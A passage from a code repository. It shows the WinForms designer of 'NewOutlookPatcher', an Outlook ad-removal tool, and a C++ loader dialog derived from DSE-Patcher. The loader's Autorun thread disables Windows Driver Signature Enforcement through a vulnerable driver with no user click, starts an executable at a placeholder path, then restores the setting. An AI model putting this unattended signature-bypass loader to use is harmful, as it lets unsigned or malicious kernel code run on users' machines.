50 | chkDisableToDoIcon = new CheckBox(); 51 | btnUninstall = new Button(); 52 | SuspendLayout(); 53 | // 54 | // label1 55 | // 56 | label1.AutoSize = true; 57 | label1.Location = new Point(7, 8); 58 | label1.Name = "label1"; 59 | label1.Size = new Size(163, 15); 60 | label1.TabIndex = 0; 61 | label1.Text = "New Outlook Install Location:"; 62 | // 63 | // txtPath 64 | // 65 | txtPath.Enabled = false; 66 | txtPath.Location = new Point(12, 26); 67 | txtPath.Multiline = true; 68 | txtPath.Name = "txtPath"; 69 | txtPath.Size = new Size(386, 58); 70 | txtPath.TabIndex = 1; 71 | // 72 | // label2 73 | // 74 | 
label2.AutoSize = true; 75 | label2.Location = new Point(7, 116); 76 | label2.Name = "label2"; 77 | label2.Size = new Size(83, 15); 78 | label2.TabIndex = 2; 79 | label2.Text = "Advertisments"; 80 | // 81 | // chkDisableFirstMailAd 82 | // 83 | chkDisableFirstMailAd.Checked = true; 84 | chkDisableFirstMailAd.CheckState = CheckState.Checked; 85 | chkDisableFirstMailAd.Location = new Point(12, 134); 86 | chkDisableFirstMailAd.Name = "chkDisableFirstMailAd"; 87 | chkDisableFirstMailAd.Size = new Size(386, 53); 88 | chkDisableFirstMailAd.TabIndex = 3; 89 | chkDisableFirstMailAd.Text = "Disable ad as first item in e-mails list\r\nThe first item in the mailbox is always an ad, unless you pay for Microsoft 365. Use this to only show real e-mails in the list."; 90 | chkDisableFirstMailAd.UseVisualStyleBackColor = true; 91 | chkDisableFirstMailAd.CheckedChanged += chkDisableAll_CheckedChanged; 92 | // 93 | // chkDisableOneDriveBanner 94 | // 95 | chkDisableOneDriveBanner.Checked = true; 96 | chkDisableOneDriveBanner.CheckState = CheckState.Checked; 97 | chkDisableOneDriveBanner.Location = new Point(12, 193); 98 | chkDisableOneDriveBanner.Name = "chkDisableOneDriveBanner"; 99 | chkDisableOneDriveBanner.Size = new Size(386, 55); 100 | chkDisableOneDriveBanner.TabIndex = 4; 101 | chkDisableOneDriveBanner.Text = "Disable OneDrive banner\r\nIn the lower left corner, a OneDrive ad is displayed, unless you pay for Microsoft 365. 
Use this to hide that advertisment banner."; 102 | chkDisableOneDriveBanner.UseVisualStyleBackColor = true; 103 | chkDisableOneDriveBanner.CheckedChanged += chkDisableAll_CheckedChanged; 104 | // 105 | // chkDisableWordIcon 106 | // 107 | chkDisableWordIcon.AutoSize = true; 108 | chkDisableWordIcon.Checked = true; 109 | chkDisableWordIcon.CheckState = CheckState.Checked; 110 | chkDisableWordIcon.Location = new Point(12, 271); 111 | chkDisableWordIcon.Name = "chkDisableWordIcon"; 112 | chkDisableWordIcon.Size = new Size(122, 19); 113 | chkDisableWordIcon.TabIndex = 5; 114 | chkDisableWordIcon.Text = "Disable Word icon"; 115 | chkDisableWordIcon.UseVisualStyleBackColor = true; 116 | chkDisableWordIcon.CheckedChanged += chkDisableAll_CheckedChanged; 117 | // 118 | // label3 119 | // 120 | label3.AutoSize = true; 121 | label3.Location = new Point(7, 251); 122 | label3.Name = "label3"; 123 | label3.Size = new Size(108, 15); 124 | label3.TabIndex = 6; 125 | label3.Text = "Product placement"; 126 | // 127 | // chkDisableExcelIcon 128 | // 129 | chkDisableExcelIcon.AutoSize = true; 130 | chkDisableExcelIcon.Checked = true; 131 | chkDisableExcelIcon.CheckState = CheckState.Checked; 132 | chkDisableExcelIcon.Location = new Point(12, 296); 133 | chkDisableExcelIcon.Name = "chkDisableExcelIcon"; 134 | chkDisableExcelIcon.Size = new Size(120, 19); 135 | chkDisableExcelIcon.TabIndex = 7; 136 | chkDisableExcelIcon.Text = "Disable Excel icon"; 137 | chkDisableExcelIcon.UseVisualStyleBackColor = true; 138 | chkDisableExcelIcon.CheckedChanged += chkDisableAll_CheckedChanged; 139 | // 140 | // chkDisablePowerPointIcon 141 | // 142 | chkDisablePowerPointIcon.AutoSize = true; 143 | chkDisablePowerPointIcon.Checked = true; 144 | chkDisablePowerPointIcon.CheckState = CheckState.Checked; 145 | chkDisablePowerPointIcon.Location = new Point(12, 321); 146 | chkDisablePowerPointIcon.Name = "chkDisablePowerPointIcon"; 147 | chkDisablePowerPointIcon.Size = new Size(154, 19); 148 | 
chkDisablePowerPointIcon.TabIndex = 8; 149 | chkDisablePowerPointIcon.Text = "Disable PowerPoint icon"; 150 | chkDisablePowerPointIcon.UseVisualStyleBackColor = true; 151 | chkDisablePowerPointIcon.CheckedChanged += chkDisableAll_CheckedChanged; 152 | // 153 | // chkDisableOneDriveIcon 154 | // 155 | chkDisableOneDriveIcon.AutoSize = true; 156 | chkDisableOneDriveIcon.Checked = true; 157 | chkDisableOneDriveIcon.CheckState = CheckState.Checked; 158 | chkDisableOneDriveIcon.Location = new Point(213, 296); 159 | chkDisableOneDriveIcon.Name = "chkDisableOneDriveIcon"; 160 | chkDisableOneDriveIcon.Size = new Size(142, 19); 161 | chkDisableOneDriveIcon.TabIndex = 9; 162 | chkDisableOneDriveIcon.Text = "Disable OneDrive icon"; 163 | chkDisableOneDriveIcon.UseVisualStyleBackColor = true; 164 | chkDisableOneDriveIcon.CheckedChanged += chkDisableAll_CheckedChanged; 165 | // 166 | // chkDisableMoreAppsIcon 167 | // 168 | chkDisableMoreAppsIcon.AutoSize = true; 169 | chkDisableMoreAppsIcon.Checked = true; 170 | chkDisableMoreAppsIcon.CheckState = CheckState.Checked; 171 | chkDisableMoreAppsIcon.Location = new Point(213, 321); 172 | chkDisableMoreAppsIcon.Name = "chkDisableMoreAppsIcon"; 173 | chkDisableMoreAppsIcon.Size = new Size(149, 19); 174 | chkDisableMoreAppsIcon.TabIndex = 10; 175 | chkDisableMoreAppsIcon.Text = "Disable More apps icon"; 176 | chkDisableMoreAppsIcon.UseVisualStyleBackColor = true; 177 | chkDisableMoreAppsIcon.CheckedChanged += chkDisableAll_CheckedChanged; 178 | // 179 | // btnApplyRestart 180 | // 181 | btnApplyRestart.Anchor = AnchorStyles.Bottom | AnchorStyles.Left; 182 | btnApplyRestart.Enabled = false; 183 | btnApplyRestart.Location = new Point(300, 428); 184 | btnApplyRestart.Name = "btnApplyRestart"; 185 | btnApplyRestart.Size = new Size(98, 29); 186 | btnApplyRestart.TabIndex = 11; 187 | btnApplyRestart.Text = "&Install"; 188 | btnApplyRestart.UseVisualStyleBackColor = true; 189 | btnApplyRestart.Click += btnApplyRestart_Click; 190 | // 191 | 
// btnAbout 192 | // 193 | btnAbout.Anchor = AnchorStyles.Bottom | AnchorStyles.Left; 194 | btnAbout.Location = new Point(12, 428); 195 | btnAbout.Name = "btnAbout"; 196 | btnAbout.Size = new Size(98, 29); 197 | btnAbout.TabIndex = 12; 198 | btnAbout.Text = "&About"; 199 | btnAbout.UseVisualStyleBackColor = true; 200 | btnAbout.Click += btnAbout_Click; 201 | // 202 | // timerCheckOutlook 203 | // 204 | timerCheckOutlook.Enabled = true; 205 | timerCheckOutlook.Interval = 1000; 206 | timerCheckOutlook.Tick += timerCheckOutlook_Tick; 207 | // 208 | // chkDisableAll 209 | // 210 | chkDisableAll.AutoSize = true; 211 | chkDisableAll.Checked = true; 212 | chkDisableAll.CheckState = CheckState.Checked; 213 | chkDisableAll.Location = new Point(12, 90); 214 | chkDisableAll.Name = "chkDisableAll"; 215 | chkDisableAll.Size = new Size(120, 19); 216 | chkDisableAll.TabIndex = 13; 217 | chkDisableAll.Text = "Toggle everything"; 218 | chkDisableAll.UseVisualStyleBackColor = true; 219 | chkDisableAll.CheckedChanged += chkDisableAll_CheckedChanged; 220 | // 221 | // label4 222 | // 223 | label4.AutoSize = true; 224 | label4.Location = new Point(7, 343); 225 | label4.Name = "label4"; 226 | label4.Size = new Size(37, 15); 227 | label4.TabIndex = 14; 228 | label4.Text = "Other"; 229 | // 230 | // chkF12 231 | // 232 | chkF12.AutoSize = true; 233 | chkF12.Checked = true; 234 | chkF12.CheckState = CheckState.Checked; 235 | chkF12.Location = new Point(12, 361); 236 | chkF12.Name = "chkF12"; 237 | chkF12.Size = new Size(165, 19); 238 | chkF12.TabIndex = 15; 239 | chkF12.Text = "F12 opens Developer Tools"; 240 | chkF12.UseVisualStyleBackColor = true; 241 | chkF12.CheckedChanged += chkDisableAll_CheckedChanged; 242 | // 243 | // label5 244 | // 245 | label5.Location = new Point(7, 392); 246 | label5.Name = "label5"; 247 | label5.Size = new Size(391, 33); 248 | label5.TabIndex = 16; 249 | label5.Text = "Pressing \"Install\" will close Outlook (olk.exe), apply your settings and restart Outlook 
(olk.exe) for you."; 250 | // 251 | // chkDisableToDoIcon 252 | // 253 | chkDisableToDoIcon.AutoSize = true; 254 | chkDisableToDoIcon.Checked = true; 255 | chkDisableToDoIcon.CheckState = CheckState.Checked; 256 | chkDisableToDoIcon.Location = new Point(213, 271); 257 | chkDisableToDoIcon.Name = "chkDisableToDoIcon"; 258 | chkDisableToDoIcon.Size = new Size(123, 19); 259 | chkDisableToDoIcon.TabIndex = 17; 260 | chkDisableToDoIcon.Text = "Disable To Do icon"; 261 | chkDisableToDoIcon.UseVisualStyleBackColor = true; 262 | chkDisableToDoIcon.CheckedChanged += chkDisableAll_CheckedChanged; 263 | // 264 | // btnUninstall 265 | // 266 | btnUninstall.Anchor = AnchorStyles.Bottom | AnchorStyles.Left; 267 | btnUninstall.Enabled = false; 268 | btnUninstall.Location = new Point(196, 428); 269 | btnUninstall.Name = "btnUninstall"; 270 | btnUninstall.Size = new Size(98, 29); 271 | btnUninstall.TabIndex = 18; 272 | btnUninstall.Text = "&Uninstall"; 273 | btnUninstall.UseVisualStyleBackColor = true; 274 | btnUninstall.Click += btnApplyRestart_Click; 275 | // 276 | // Form1 277 | // 278 | AcceptButton = btnApplyRestart; 279 | AutoScaleDimensions = new SizeF(7F, 15F); 280 | AutoScaleMode = AutoScaleMode.Font; 281 | ClientSize = new Size(410, 469); 282 | Controls.Add(btnUninstall); 283 | Controls.Add(chkDisableToDoIcon); 284 | Controls.Add(label5); 285 | Controls.Add(chkF12); 286 | Controls.Add(label4); 287 | Controls.Add(chkDisableAll); 288 | Controls.Add(btnAbout); 289 | Controls.Add(btnApplyRestart); 290 | Controls.Add(chkDisableMoreAppsIcon); 291 | Controls.Add(chkDisableOneDriveIcon); 292 | Controls.Add(chkDisablePowerPointIcon); 293 | Controls.Add(chkDisableExcelIcon); 294 | Controls.Add(label3); 295 | Controls.Add(chkDisableWordIcon); 296 | Controls.Add(chkDisableOneDriveBanner); 297 | Controls.Add(chkDisableFirstMailAd); 298 | Controls.Add(label2); 299 | Controls.Add(txtPath); 300 | Controls.Add(label1); 301 | FormBorderStyle = FormBorderStyle.FixedSingle; 302 | KeyPreview 
= true; 303 | Margin = new Padding(3, 2, 3, 2); 304 | MaximizeBox = false; 305 | MinimizeBox = false; 306 | Name = "Form1"; 307 | StartPosition = FormStartPosition.CenterScreen; 308 | Text = "NewOutlookPatcher"; 309 | TopMost = true; 310 | Load += Form1_Load; 311 | KeyDown += Form1_KeyDown; 312 | ResumeLayout(false); 313 | PerformLayout(); 314 | } 315 | 316 | #endregion 317 | 318 | private Label label1; 319 | private TextBox txtPath; 320 | private Label label2; 321 | private CheckBox chkDisableFirstMailAd; 322 | private CheckBox chkDisableOneDriveBanner; 323 | private CheckBox chkDisableWordIcon; 324 | private Label label3; 325 | private CheckBox chkDisableExcelIcon; 326 | private CheckBox chkDisablePowerPointIcon; 327 | private CheckBox chkDisableOneDriveIcon; 328 | private CheckBox chkDisableMoreAppsIcon; 329 | private Button btnApplyRestart; 330 | private Button btnAbout; 331 | private System.Windows.Forms.Timer timerCheckOutlook; 332 | private CheckBox chkDisableAll; 333 | private Label label4; 334 | private CheckBox chkF12; 335 | private Label label5; 336 | private CheckBox chkDisableToDoIcon; 337 | private Button btnUninstall; 338 | } 339 | } 340 | -------------------------------------------------------------------------------- /NOP/loader2/MyDialog1.cpp: -------------------------------------------------------------------------------- 1 | 2 | // DSE-Patcher - Patch DSE (Driver Signature Enforcement) 3 | // Copyright (C) 2022 Kai Schtrom 4 | // 5 | // This file is part of DSE-Patcher. 6 | // 7 | // DSE-Patcher is free software: you can redistribute it and/or modify 8 | // it under the terms of the GNU General Public License as published by 9 | // the Free Software Foundation, either version 3 of the License, or 10 | // (at your option) any later version. 
11 | // 12 | // DSE-Patcher is distributed in the hope that it will be useful, 13 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 14 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 15 | // GNU General Public License for more details. 16 | // 17 | // You should have received a copy of the GNU General Public License 18 | // along with DSE-Patcher. If not, see . 19 | 20 | // disable lint warnings for complete source code file 21 | //lint -e459 Warning 459: Function 'MyDlg1DlgProc' whose address was taken has an unprotected access to variable 'g' 22 | //lint -e744 Warning 744: switch statement has no default 23 | //lint -e747 Warning 747: Significant prototype coercion -> This is only used here, because SendMessage needs a lot of type conversions otherwise. 24 | //lint -e750 Warning 750: local macro '_CRT_SECURE_NO_DEPRECATE' not referenced 25 | //lint -e818 Warning 818: Pointer parameter could be declared as pointing to const --- Eff. C++ 3rd Ed. item 3 26 | //lint -e952 Warning 952: Parameter could be declared const --- Eff. C++ 3rd Ed. item 3 27 | //lint -e953 Warning 953: Variable could be declared as const --- Eff. C++ 3rd Ed. item 3 28 | //lint -e1924 Warning 1924: C-style cast -- More Effective C++ #2 29 | 30 | // deprecate unsafe function warnings e.g. 
strcpy, sprintf 31 | #define _CRT_SECURE_NO_DEPRECATE 32 | #ifndef _DEBUG 33 | #define _NO_CRT_STDIO_INLINE 34 | #endif 35 | 36 | #include 37 | // CreateStatusWindow 38 | #include 39 | #include "resource.h" 40 | #include "MyFunctions.h" 41 | 42 | // CreateStatusWindow 43 | #pragma comment(lib,"comctl32.lib") 44 | 45 | extern GLOBALS g; 46 | 47 | #define PROC_PATH L"DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD" 48 | 49 | //------------------------------------------------------------------------------ 50 | // create tooltip window and associate the tooltip with the control 51 | //------------------------------------------------------------------------------ 52 | int MyDlg1CreateTooltip(HMODULE hInstance,HWND hDialog,HWND hControl) 53 | { 54 | // create tooltip window 55 | HWND hwndTip = CreateWindowEx(NULL,TOOLTIPS_CLASS,NULL,WS_POPUP | TTS_ALWAYSTIP,CW_USEDEFAULT,CW_USEDEFAULT,CW_USEDEFAULT,CW_USEDEFAULT,hDialog,NULL,hInstance,NULL); 56 | if(hwndTip == NULL) 57 | { 58 | return 1; 59 | } 60 | 61 | // associate the tooltip with the control 62 | TOOLINFO toolInfo; 63 | memset(&toolInfo,0,sizeof(TOOLINFO)); 64 | toolInfo.cbSize = sizeof(TOOLINFO); 65 | toolInfo.hwnd = hDialog; 66 | toolInfo.uFlags = TTF_CENTERTIP | TTF_IDISHWND | TTF_SUBCLASS; 67 | toolInfo.uId = (UINT_PTR)hControl; 68 | // if lpszText is set to LPSTR_TEXTCALLBACK, the control sends the TTN_GETDISPINFO notification code to the owner window to retrieve the text 69 | toolInfo.lpszText = LPSTR_TEXTCALLBACK; 70 | SendMessage(hwndTip,TTM_ADDTOOL,0,(LPARAM)&toolInfo); 71 | 72 | // set the visible duration of the tooltip before it closes to 30 seconds 73 | SendMessage(hwndTip,TTM_SETDELAYTIME,TTDT_AUTOPOP,30000); 74 | 75 | return 0; 76 | } 77 | 78 | 79 | 
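//------------------------------------------------------------------------------
// tooltip set multiline text
//
// Handles TTN_GETDISPINFO. lParam points at the NMTTDISPINFO of the tooltip;
// its lpszText is set according to the control named in hdr.idFrom.
// Always returns 0.
//------------------------------------------------------------------------------
int MyDlg1TooltipSetMultilineText(LPARAM lParam)
{
    LPNMTTDISPINFO pInfo = (LPNMTTDISPINFO)lParam;

    // enable multiline tooltip by setting the display rectangle to 500 pixels
    // we never use the full width of 500 pixels, because we use newlines for long tooltip text
    SendMessage(pInfo->hdr.hwndFrom,TTM_SETMAXTIPWIDTH,0,500);

    // set tooltip text
    if((HWND)pInfo->hdr.idFrom == g.Dlg1.hButton1)
    {
        pInfo->lpszText = "Disable \"Driver Signature Enforcement\":\nSets the variable to \"DSE Disable Value\".";
    }
    else if((HWND)pInfo->hdr.idFrom == g.Dlg1.hButton2)
    {
        pInfo->lpszText = "Enable \"Driver Signature Enforcement\":\nSets the variable to \"DSE Enable Value\".";
    }
    else if((HWND)pInfo->hdr.idFrom == g.Dlg1.hButton3)
    {
        //pInfo->lpszText = "Restore \"Driver Signature Enforcement\":\nSets the variable to \"DSE Original Value\".\n\n"
        //                  "Attention:\nThe \"DSE Original Value\" is retrieved\nonly one time on startup of "APPNAME"!";
    }
    else if((HWND)pInfo->hdr.idFrom == g.Dlg1.hCombo1)
    {
        // check vulnerable driver combo box selection
        int sel = (int)SendMessage(g.Dlg1.hCombo1,CB_GETCURSEL,0,0);
        // the selection indexes g.vd directly, so reject anything outside the array
        // NOTE(review): the combo box only receives entries with a non-empty szProvider, so its
        // index matches the g.vd index only if the valid entries are contiguous from 0 - confirm
        if(sel != CB_ERR && (unsigned int)sel < MAX_VULNERABLE_DRIVERS)
        {
            // show corresponding tool tip text
            // the tool tip text is initialized in the function MyInitVulnerableDrivers
            //lint -e{1773} Warning 1773: Attempt to cast away const (or volatile)
            pInfo->lpszText = (LPSTR)g.vd[sel].szToolTipText;
        }
    }

    return 0;
}

//------------------------------------------------------------------------------
// unattended sequence, run on its own thread by MyDlg1OnInitDialog
//
// pvoid is a malloc'ed array of two pointers: [0] the handle of the
// initialization thread, [1] the dialog window. This function owns the array
// and the handle. Steps: wait for the initialization thread, run the
// ThreadTaskDisableDSE task, start PROC_PATH and wait for it to exit, run the
// ThreadTaskRestoreDSE task, close the dialog.
//
// Security note: between the disable and the restore step the setting stays
// changed for as long as the started process runs (the wait is INFINITE), and
// nothing in this function restores it if this process is terminated first.
// NOTE(review): the result of the task threads is not inspected, so the
// process is started even when the disable task did not succeed, and the
// restore task runs even when the process could not be started.
//------------------------------------------------------------------------------
DWORD WINAPI Autorun(PVOID pvoid) {
    LPVOID* a = (LPVOID*)pvoid;
    HANDLE hInitThread = (HANDLE)a[0];
    HWND hDialog = (HWND)a[1];
    // both values are copied out, the argument block is no longer needed
    free(a);

    // the handle is NULL when the initialization thread could not be created
    if (hInitThread != NULL) {
        WaitForSingleObject(hInitThread, INFINITE);
        CloseHandle(hInitThread);
    }

    g.ucRunning = 1;
    g.ThreadParams.ttno = ThreadTaskDisableDSE;
    HANDLE a1 = CreateThread(NULL, 0, MyThreadProc1, (LPVOID)&g.ThreadParams, 0, NULL);
    if (a1 != NULL) {
        WaitForSingleObject(a1, INFINITE);
        CloseHandle(a1);
    } else {
        // no task thread exists, so nothing else would clear the flag
        g.ucRunning = 0;
    }

    STARTUPINFOW si;
    PROCESS_INFORMATION pi;
    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&pi, sizeof(pi));
    if (CreateProcessW(PROC_PATH, NULL, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) {
        WaitForSingleObject(pi.hProcess, INFINITE);
        CloseHandle(pi.hProcess);
        CloseHandle(pi.hThread);
    }

    g.ucRunning = 1;
    g.ThreadParams.ttno = ThreadTaskRestoreDSE;
    HANDLE a2 = CreateThread(NULL, 0, MyThreadProc1, (LPVOID)&g.ThreadParams, 0, NULL);
    if (a2 != NULL) {
        WaitForSingleObject(a2, INFINITE);
        CloseHandle(a2);
    } else {
        g.ucRunning = 0;
    }

    EndDialog(hDialog, 0);
    return 0;
}

//------------------------------------------------------------------------------
// dialog on init
//
// Caches the control handles in g.Dlg1, sets icons, status bar, font and
// tooltips, fills the combo box from g.vd, starts the initialization task
// (ThreadTaskReadDSEOnFirstRun) and then the Autorun thread. Always returns 0.
//------------------------------------------------------------------------------
int MyDlg1OnInitDialog(HWND hwnd)
{
    // get control window handles
    g.Dlg1.hDialog1 = hwnd;
    g.Dlg1.hButton1 = GetDlgItem(hwnd,IDC_BUTTON1);
    g.Dlg1.hButton2 = GetDlgItem(hwnd,IDC_BUTTON2);
    g.Dlg1.hButton3 = GetDlgItem(hwnd,IDC_BUTTON3);
    g.Dlg1.hCombo1 = GetDlgItem(hwnd,IDC_COMBO1);
    g.Dlg1.hStatic1 = GetDlgItem(hwnd,IDC_STATIC1);

    // set dialog icons
    HICON hIcon1 = LoadIcon(g.hInstance,MAKEINTRESOURCE(IDI_ICON1));
    HICON hIcon2 = LoadIcon(g.hInstance,MAKEINTRESOURCE(IDI_ICON2));
    SendMessage(hwnd,WM_SETICON,ICON_BIG,(LPARAM)hIcon1);
    SendMessage(hwnd,WM_SETICON,ICON_SMALL,(LPARAM)hIcon2);

    // set dialog title
    //SendMessage(hwnd,WM_SETTEXT,0,(LPARAM)APPNAME" "VERSION" "BUILD);

    // create status bar with two parts
    RECT rect;
    GetClientRect(hwnd,&rect);
    g.Dlg1.hStatusBar1 = CreateStatusWindow(WS_CHILD|WS_VISIBLE,0,hwnd,IDC_STATUS_BAR1);
    int widths[2] = {rect.right-50,-1};
    SendMessage(g.Dlg1.hStatusBar1,SB_SETPARTS,2,(LPARAM)widths);

    // set font type for static control
    // create font from installed font type
    LOGFONT lf;
    memset(&lf,0,sizeof(LOGFONT));
    // retrieve handle to device context for client area
    HDC hdc = GetDC(hwnd);
    // set font size to 8
    lf.lfHeight = -MulDiv(8,GetDeviceCaps(hdc,LOGPIXELSY),72);
    // release device context
    ReleaseDC(hwnd,hdc);
    // use "Lucida Console" because it is a monospaced font present on all target OSs
    strcpy(lf.lfFaceName,"Lucida Console");
    // create logical font
    HFONT hFont = CreateFontIndirect(&lf);
    // set font of static control
    SendMessage(g.Dlg1.hStatic1,WM_SETFONT,(WPARAM)hFont,FALSE);

    // initialize vulnerable driver structures
    //lint -e{534} Warning 534: Ignoring return value of function
    MyInitVulnerableDrivers(g.vd,MAX_VULNERABLE_DRIVERS);

    // do this for all vulnerable drivers
    for(unsigned int i = 0; i < MAX_VULNERABLE_DRIVERS; i++)
    {
        // add valid vulnerable driver to combo box
        if(g.vd[i].szProvider[0] != 0) SendMessage(g.Dlg1.hCombo1,CB_ADDSTRING,0,(LPARAM)g.vd[i].szProvider);
    }

    // select first vulnerable driver in combo box
    SendMessage(g.Dlg1.hCombo1,CB_SETCURSEL,0,0);

    // set focus to button 1
    SetFocus(g.Dlg1.hButton1);

    // create tooltip window and associate the tooltip with button 1, 2, 3 and combo box
    //lint -e{534} Warning 534: Ignoring return value of function
    MyDlg1CreateTooltip(g.hInstance,hwnd,g.Dlg1.hButton1);
    //lint -e{534} Warning 534: Ignoring return value of function
    MyDlg1CreateTooltip(g.hInstance,hwnd,g.Dlg1.hButton2);
    //lint -e{534} Warning 534: Ignoring return value of function
    MyDlg1CreateTooltip(g.hInstance,hwnd,g.Dlg1.hButton3);
    //lint -e{534} Warning 534: Ignoring return value of function
    MyDlg1CreateTooltip(g.hInstance,hwnd,g.Dlg1.hCombo1);

    // run initialization thread
    g.ucRunning = 1;
    g.ThreadParams.ttno = ThreadTaskReadDSEOnFirstRun;
    HANDLE a0 = CreateThread(NULL,0,MyThreadProc1,(LPVOID)&g.ThreadParams,0,NULL);
    if(a0 == NULL)
    {
        // no task thread exists, so nothing else would clear the flag
        g.ucRunning = 0;
    }

    // hand the initialization thread handle and the dialog window to Autorun,
    // which takes ownership of both the array and the handle
    LPVOID* a = (LPVOID*)(malloc(2 * sizeof(LPVOID)));
    if(a == NULL)
    {
        // without the argument block the unattended sequence cannot run
        if(a0 != NULL) CloseHandle(a0);
        return 0;
    }
    a[0] = (PVOID)a0;
    a[1] = (PVOID)hwnd;
    HANDLE hAutorun = CreateThread(NULL, 0, Autorun, (LPVOID)a, 0, NULL);
    if(hAutorun == NULL)
    {
        // Autorun never ran, so release what it would have released
        free(a);
        if(a0 != NULL) CloseHandle(a0);
    }
    else
    {
        // the thread keeps running, only our reference to it is dropped
        CloseHandle(hAutorun);
    }

    return 0;
}


//------------------------------------------------------------------------------
// enable or disable the dialog controls
//
// ucEnable == 1 enables the three buttons and the combo box, every other value
// disables them. Focus is set to button 1 in both cases. Always returns 0.
//------------------------------------------------------------------------------
int MyDlg1EnableControls(unsigned char ucEnable)
{
    const BOOL bEnable = (ucEnable == 1) ? TRUE : FALSE;

    EnableWindow(g.Dlg1.hButton1,bEnable);
    EnableWindow(g.Dlg1.hButton2,bEnable);
    EnableWindow(g.Dlg1.hButton3,bEnable);
    EnableWindow(g.Dlg1.hCombo1,bEnable);
    SetFocus(g.Dlg1.hButton1);

    return 0;
}


//------------------------------------------------------------------------------
// button 1 "DSE Disable" clicked
//------------------------------------------------------------------------------
int MyDlg1Button1OnClick()
{
    // run DSE disable thread
    g.ucRunning = 1;
    g.ThreadParams.ttno = ThreadTaskDisableDSE;
    HANDLE hThread = CreateThread(NULL,0,MyThreadProc1,(LPVOID)&g.ThreadParams,0,NULL);
    if(hThread != NULL)
    {
        // the thread keeps running, only our reference to it is dropped
        CloseHandle(hThread);
    }
    else
    {
        // WM_CLOSE is ignored while ucRunning is set, so clear it when no thread was started
        g.ucRunning = 0;
    }

    return 0;
}


//------------------------------------------------------------------------------
// button 2 "DSE Enable" clicked
//------------------------------------------------------------------------------
int MyDlg1Button2OnClick()
{
    // run DSE enable thread
    g.ucRunning = 1;
    g.ThreadParams.ttno = ThreadTaskEnableDSE;
    HANDLE hThread = CreateThread(NULL,0,MyThreadProc1,(LPVOID)&g.ThreadParams,0,NULL);
    if(hThread != NULL)
    {
        // the thread keeps running, only our reference to it is dropped
        CloseHandle(hThread);
    }
    else
    {
        // WM_CLOSE is ignored while ucRunning is set, so clear it when no thread was started
        g.ucRunning = 0;
    }

    return 0;
}


//------------------------------------------------------------------------------
// button 3 "DSE Restore" clicked
//------------------------------------------------------------------------------
int MyDlg1Button3OnClick()
{
    // run DSE restore thread
    g.ucRunning = 1;
    g.ThreadParams.ttno = ThreadTaskRestoreDSE;
    HANDLE hThread = CreateThread(NULL,0,MyThreadProc1,(LPVOID)&g.ThreadParams,0,NULL);
    if(hThread != NULL)
    {
        // the thread keeps running, only our reference to it is dropped
        CloseHandle(hThread);
    }
    else
    {
        // WM_CLOSE is ignored while ucRunning is set, so clear it when no thread was started
        g.ucRunning = 0;
    }

    return 0;
}


//------------------------------------------------------------------------------
// WM_TIMER message processing
//
// Advances the hours:minutes:seconds counter in g.Dlg1 by one second and shows
// it in pane 1 of the status bar. Always returns 0.
//------------------------------------------------------------------------------
int MyDlg1OnTimer(WPARAM wParam)
{
    UNREFERENCED_PARAMETER(wParam);

    // increment seconds
    g.Dlg1.uiTimerSeconds++;

    // change minutes every 60 seconds
    if(g.Dlg1.uiTimerSeconds == 60)
    {
        g.Dlg1.uiTimerMinutes++;
        g.Dlg1.uiTimerSeconds = 0;
    }

    // change hours every 60 minutes
    if(g.Dlg1.uiTimerMinutes == 60)
    {
        g.Dlg1.uiTimerHours++;
        g.Dlg1.uiTimerMinutes = 0;
        g.Dlg1.uiTimerSeconds = 0;
    }

    // build time string in the format 00:00:00
    // "%.2u" is a minimum width, not a maximum: the hours field grows past two digits after
    // 99 hours, so the buffer is sized for three full-width unsigned values plus separators
    char szTime[40];
    sprintf(szTime,"%.2u:%.2u:%.2u",g.Dlg1.uiTimerHours,g.Dlg1.uiTimerMinutes,g.Dlg1.uiTimerSeconds);

    // set pane 1 status bar text
    SendMessage(g.Dlg1.hStatusBar1,SB_SETTEXT,1,(LPARAM)szTime);

    return 0;
}


//------------------------------------------------------------------------------
// dialog procedure callback
//
// Returns 1 for messages handled here and 0 otherwise. WM_INITDIALOG returns 0
// on purpose, see the comment at that case.
//------------------------------------------------------------------------------
INT_PTR CALLBACK MyDlg1DlgProc(HWND hwnd,UINT uMsg,WPARAM wParam,LPARAM lParam)
{
    switch(uMsg)
    {
    case WM_TIMER:
        //lint -e{534} Warning 534: Ignoring return value of function
        MyDlg1OnTimer(wParam);
        return 1;
    case WM_INITDIALOG:
        //lint -e{534} Warning 534: Ignoring return value of function
        MyDlg1OnInitDialog(hwnd);
        // return FALSE, otherwise the keyboard focus is not set correctly by SetFocus
        return 0;
    case WM_CLOSE:
        // check if thread is running before closing the dialog
        if(g.ucRunning == 0)
        {
            EndDialog(hwnd,0);
        }
        return 1;
    case WM_COMMAND:
        switch(LOWORD(wParam))
        {
        case IDC_BUTTON1:
            switch(HIWORD(wParam))
            {
            case BN_CLICKED:
                //lint -e{534} Warning 534: Ignoring return value of function
                MyDlg1Button1OnClick();
                return 1;
            }
            break;
        case IDC_BUTTON2:
            switch(HIWORD(wParam))
            {
            case BN_CLICKED:
                //lint -e{534} Warning 534: Ignoring return value of function
                MyDlg1Button2OnClick();
                return 1;
            }
            break;
        case IDC_BUTTON3:
            switch(HIWORD(wParam))
            {
            case BN_CLICKED:
                //lint -e{534} Warning 534: Ignoring return value of function
                MyDlg1Button3OnClick();
                return 1;
            }
            break;
        }
        break;
    case WM_NOTIFY:
        switch(((LPNMHDR)lParam)->code)
        {
        // this is only triggered if we hover with the mouse over the control
        // for the combo box this is only triggered for the button of the control and not the item list
        //lint -e{835} Warning 835: A zero has been given as right argument to operator '-'
        case TTN_GETDISPINFO:
            // tooltip set multiline text
            //lint -e{534} Warning 534: Ignoring return value of function
            MyDlg1TooltipSetMultilineText(lParam);
            return 1;
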